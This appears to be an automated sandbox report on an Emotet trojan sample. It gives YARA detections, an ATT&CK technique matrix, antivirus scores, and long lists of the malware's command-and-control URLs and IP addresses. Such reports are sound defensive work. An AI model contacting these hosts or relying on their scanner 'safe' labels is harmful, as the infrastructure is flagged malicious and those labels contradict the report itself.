Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000E.00000002.642858503.0000014ADB16D000.00000004.00000001.sdmp	Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 0000000F.00000002.640571004.000001D477629000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 3.2.mfnetsrc.exe.29f279e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.29c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.2aa0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.29f279e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.29f052e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mfnetsrc.exe.29f052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0TOEtGJHN8.exe.290052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.642790111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.642626999.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249721472.0000000002944000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel22	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API11	Windows Service2	Windows Service2	Obfuscated Files or Information1	LSASS Memory	System Service Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution1	Logon Script (Windows)	Process Injection2	DLL Side-Loading1	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	System Information Discovery25	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol112	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading12	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion12	Cached Domain Credentials	Security Software Discovery141	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection2	DCSync	Virtualization/Sandbox Evasion12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0TOEtGJHN8.exe	86%	Virustotal		Browse
0TOEtGJHN8.exe	54%	Metadefender		Browse
0TOEtGJHN8.exe	88%	ReversingLabs	Win32.Trojan.Injuke
0TOEtGJHN8.exe	100%	Avira	TR/Crypt.Agent.hgrgz
0TOEtGJHN8.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.0TOEtGJHN8.exe.290279e.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.mfnetsrc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139844	Download File
3.2.mfnetsrc.exe.29f279e.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.0TOEtGJHN8.exe.29c0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.mfnetsrc.exe.2aa0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.0TOEtGJHN8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139844	Download File
0.2.0TOEtGJHN8.exe.290052e.2.unpack	100%	Avira	HEUR/AGEN.1110377	Download File
0.0.0TOEtGJHN8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139844	Download File
3.2.mfnetsrc.exe.29f052e.1.unpack	100%	Avira	HEUR/AGEN.1110377	Download File
3.2.mfnetsrc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139844	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/b4ILIf/Q8rZVqkkq/rDnmG2Ans/	0%	Avira URL Cloud	safe
http://102.182.145.130/Zffxf	0%	Avira URL Cloud	safe
http://64.207.182.168:8080/OQYP1ogFQccmQuTysw1/v0tPhparrkDhC/NKHirfkcd6IUp4b2kRd/qhg8GSGX1b4ILIf/Q8r	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/A	0%	Avira URL Cloud	safe
http://172.104.97.173:8080/NrjO6cKOEtsgnTfdu/DdqP4I6wYv/OEK9fq/iwQk9ak8yU1H9c63AU/	0%	Avira URL Cloud	safe
http://59.125.219.109:443/VRRce6rlsw9pK/DtY9XymlLmhK7GfUco/	0%	Avira URL Cloud	safe
http://218.147.193.146/GJXuLUUeqrq95alY1u/oD6pJ15oDS4/Z4M9h0lWKV4FEH0yB/k3vm9W8xS/TW0iKm9TEcJ7gRi0P/	0%	Avira URL Cloud	safe
http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/t	0%	Avira URL Cloud	safe
http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/u	0%	Avira URL Cloud	safe
http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/	0%	Avira URL Cloud	safe
https://59.125.219.109:443/VRRce6rlsw9pK/DtY9XymlLmhK7GfUco/	0%	Avira URL Cloud	safe
http://102.182.145.130/ZffxffN/UUQGAqPKLO/	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://51.89.199.141:8080/7zUrbHAgoGBYLL/SfmOyzopGPV6GjKjz/2Kjj2o/	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://173.63.222.65/VQIMkjZKFdAVmy/be209e2c34a9550b8LMEM	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://173.63.222.65/VQIMkjZKFdAVmy/	0%	Avira URL Cloud	safe
http://172.104.97.173:8080/NrjO6cKOEtsgnTfdu/DdqP4I6wYv/OEK9fq/iwQk9ak8yU1H9c63AU/lication/octet-str	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://51.89.199.141:8080/7zUrbHAgoGBYLL/SfmOyzopGPV6GjKjz/2Kjj2o/r7Gp	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/	0%	Avira URL Cloud	safe
http://102.182.145.130/ZffxffN/UUQGAqPKLO/r	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://59.125.219.109:443/VRRce6rlsw9pK/DtY9XymlLmhK7GfUco/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/b4ILIf/Q8rZVqkkq/rDnmG2Ans/	mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	false		high
http://102.182.145.130/Zffxf	mfnetsrc.exe, 00000003.00000003.389444928.0000000003183000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000C.00000002.305240035.00000222E6C5C000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000C.00000003.304841010.00000222E6C47000.00000004.00000001.sdmp	false		high
http://64.207.182.168:8080/OQYP1ogFQccmQuTysw1/v0tPhparrkDhC/NKHirfkcd6IUp4b2kRd/qhg8GSGX1b4ILIf/Q8r	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/A	mfnetsrc.exe, 00000003.00000003.593894510.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000C.00000003.304878671.00000222E6C40000.00000004.00000001.sdmp	false		high
http://172.104.97.173:8080/NrjO6cKOEtsgnTfdu/DdqP4I6wYv/OEK9fq/iwQk9ak8yU1H9c63AU/	mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000C.00000003.304857438.00000222E6C5A000.00000004.00000001.sdmp	false		high
http://59.125.219.109:443/VRRce6rlsw9pK/DtY9XymlLmhK7GfUco/	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000C.00000003.283049058.00000222E6C31000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000C.00000003.304878671.00000222E6C40000.00000004.00000001.sdmp	false		high
http://218.147.193.146/GJXuLUUeqrq95alY1u/oD6pJ15oDS4/Z4M9h0lWKV4FEH0yB/k3vm9W8xS/TW0iKm9TEcJ7gRi0P/	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	false		high
http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/t	mfnetsrc.exe, 00000003.00000002.643371598.0000000002BC6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/u	mfnetsrc.exe, 00000003.00000003.389444928.0000000003183000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 0000000C.00000002.305156857.00000222E6C13000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000C.00000003.304894765.00000222E6C56000.00000004.00000001.sdmp	false		high
http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/	mfnetsrc.exe, 00000003.00000002.643371598.0000000002BC6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000C.00000003.283049058.00000222E6C31000.00000004.00000001.sdmp	false		high
http://102.182.145.130/ZffxffN/UUQGAqPKLO/	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000008.00000002.535270378.0000026188A11000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.599866160.00000249A94EB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000C.00000002.305258030.00000222E6C5E000.00000004.00000001.sdmp	false		high
http://51.89.199.141:8080/7zUrbHAgoGBYLL/SfmOyzopGPV6GjKjz/2Kjj2o/	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000001F.00000003.572380552.00000249A9DB7000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.572491250.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.572338438.00000249A9D95000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577751494.00000249A9D99000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000C.00000002.305156857.00000222E6C13000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	false		high
http://173.63.222.65/VQIMkjZKFdAVmy/be209e2c34a9550b8LMEM	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.xboxlive.com	svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000C.00000003.304841010.00000222E6C47000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000C.00000003.283049058.00000222E6C31000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
http://173.63.222.65/VQIMkjZKFdAVmy/	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp, mfnetsrc.exe, 00000003.00000003.593894510.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://172.104.97.173:8080/NrjO6cKOEtsgnTfdu/DdqP4I6wYv/OEK9fq/iwQk9ak8yU1H9c63AU/lication/octet-str	mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000C.00000002.305258030.00000222E6C5E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000C.00000002.305240035.00000222E6C5C000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000C.00000002.305266612.00000222E6C62000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.304857438.00000222E6C5A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://51.89.199.141:8080/7zUrbHAgoGBYLL/SfmOyzopGPV6GjKjz/2Kjj2o/r7Gp	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000C.00000002.305209467.00000222E6C3A000.00000004.00000001.sdmp	false		high
https://www.roblox.com/info/privacy	svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000C.00000002.305258030.00000222E6C5E000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/	mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://102.182.145.130/ZffxffN/UUQGAqPKLO/r	mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000C.00000002.305240035.00000222E6C5C000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000C.00000003.304857438.00000222E6C5A000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
194.4.58.192	unknown	Kazakhstan	202958	HOSTER-KZ	true
102.182.93.220	unknown	South Africa	37611	AfrihostZA	true
95.9.5.93	unknown	Turkey	9121	TTNETTR	true
94.200.114.161	unknown	United Arab Emirates	15802	DU-AS1AE	true
72.186.136.247	unknown	United States	33363	BHN-33363US	true
115.94.207.99	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
24.133.106.23	unknown	Turkey	47524	TURKSAT-ASTR	true
89.121.205.18	unknown	Romania	9050	RTDBucharestRomaniaRO	true
216.139.123.119	unknown	United States	395582	GRM-NETWORKUS	true
200.116.145.225	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
172.105.13.66	unknown	United States	63949	LINODE-APLinodeLLCUS	true
138.68.87.218	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
220.245.198.194	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
67.170.250.203	unknown	United States	7922	COMCAST-7922US	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
24.178.90.49	unknown	United States	20115	CHARTER-20115US	true
94.23.237.171	unknown	France	16276	OVHFR	true
187.161.206.24	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
41.185.28.84	unknown	South Africa	36943	GridhostZA	true
194.190.67.75	unknown	Russian Federation	50804	BESTLINE-NET-PROTVINORU	true
186.74.215.34	unknown	Panama	11556	CableWirelessPanamaPA	true
109.116.245.80	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
202.134.4.216	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
120.150.218.241	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
202.134.4.211	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
62.30.7.67	unknown	United Kingdom	5089	NTLGB	true
123.142.37.166	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
51.89.199.141	unknown	France	16276	OVHFR	true
75.143.247.51	unknown	United States	20115	CHARTER-20115US	true
49.3.224.99	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	true
162.241.140.129	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
119.59.116.21	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
172.91.208.86	unknown	United States	20001	TWC-20001-PACWESTUS	true
113.61.66.94	unknown	Australia	45510	TELCOINABOX-AULevel109HunterStreetAU	true
96.245.227.43	unknown	United States	701	UUNETUS	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
194.187.133.160	unknown	Bulgaria	13124	IBGCBG	true
121.7.31.214	unknown	Singapore	9506	SINGTEL-FIBRESingtelFibreBroadbandSG	true
112.185.64.233	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
61.76.222.210	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
46.105.131.79	unknown	France	16276	OVHFR	true
27.114.9.93	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
74.214.230.200	unknown	United States	36728	EMERYTELCOMUS	true
190.162.215.233	unknown	Chile	22047	VTRBANDAANCHASACL	true
110.145.77.103	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
154.91.33.137	unknown	Seychelles	137443	ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK	true
120.150.60.189	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
93.147.212.206	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
91.211.88.52	unknown	Ukraine	206638	HOSTFORYUA	true
172.86.188.251	unknown	Canada	32489	AMANAHA-NEWCA	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
167.114.153.111	unknown	Canada	16276	OVHFR	true
37.179.204.33	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
59.125.219.109	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	true
2.58.16.89	unknown	Latvia	64421	SERTEX-ASLV	true
62.171.142.179	unknown	United Kingdom	51167	CONTABODE	true
123.176.25.234	unknown	Maldives	7642	DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMV	true
50.91.114.38	unknown	United States	33363	BHN-33363US	true
61.33.119.226	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
217.123.207.149	unknown	Netherlands	33915	TNF-ASNL	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
173.63.222.65	unknown	United States	701	UUNETUS	true
47.36.140.164	unknown	United States	20115	CHARTER-20115US	true
110.142.236.207	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
139.99.158.11	unknown	Canada	16276	OVHFR	true
201.171.244.130	unknown	Mexico	8151	UninetSAdeCVMX	true
49.50.209.131	unknown	New Zealand	55853	MEGATEL-AS-APMegatelNZ	true
190.108.228.27	unknown	Argentina	27751	NeunetSAAR	true
202.141.243.254	unknown	Pakistan	9260	MULTINET-AS-APMultinetPakistanPvtLtdPK	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
137.59.187.107	unknown	Hong Kong	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	true
78.188.106.53	unknown	Turkey	9121	TTNETTR	true
71.15.245.148	unknown	United States	20115	CHARTER-20115US	true
188.219.31.12	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
64.207.182.168	unknown	United States	398110	GO-DADDY-COM-LLCUS	true
217.20.166.178	unknown	Ukraine	1820	WNETUS	true
24.230.141.169	unknown	United States	11232	MIDCO-NETUS	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
134.209.144.106	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
186.70.56.94	unknown	Ecuador	14522	SatnetEC	true
97.82.79.83	unknown	United States	20115	CHARTER-20115US	true
173.173.254.105	unknown	United States	11427	TWC-11427-TEXASUS	true
172.104.97.173	unknown	United States	63949	LINODE-APLinodeLLCUS	true
190.12.119.180	unknown	Argentina	11014	CPSAR	true
139.162.60.124	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
